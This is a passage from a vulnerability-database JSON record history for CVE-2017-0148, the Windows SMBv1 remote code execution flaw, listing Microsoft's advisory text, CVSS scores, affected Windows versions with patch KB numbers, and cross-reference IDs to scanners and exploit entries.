"kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-03T18:46:41", "differentElements": ["msAffectedSoftware"], "edition": 5}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "47d8cff84559a6e03e5ea58b880c90dc", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-03T20:42:24", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:156196"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "700059.PRM", "MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27613"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-03T20:42:24", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-03T20:42:24", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012216", "KB4012606", "KB4012215", "KB3212646", "KB4013429", "KB3205401", "KB4012213", "KB4012212", "KB4012217", "KB3205409", "KB4012598", "KB3210721", "KB4012214", "KB3177186", "KB4013198", "KB3210720", "KB3213986", "KBMS16-110, 3187754"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-03T20:42:24", "differentElements": ["msAffectedSoftware"], "edition": 6}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "1455b21b7b338994ddec7ae57c94d0af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-04T06:47:20", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:142181"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-27613", "1337DAY-ID-33895"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-04T06:47:20", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-04T06:47:20", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012598", "KB3205409", "KB3177186", "KB4012217", "KB4012215", "KB3213986", "KB3212646", "KB4012213", "KB4013429", "KB3205401", "KB4013198", "KB4012214", "KB4012606", "KBMS16-110, 3187754", "KB3210721", "KB3210720", "KB4012216", "KB4012212"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-04T06:47:20", "differentElements": ["msAffectedSoftware"], "edition": 7}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "47d8cff84559a6e03e5ea58b880c90dc", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-04T08:55:45", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, 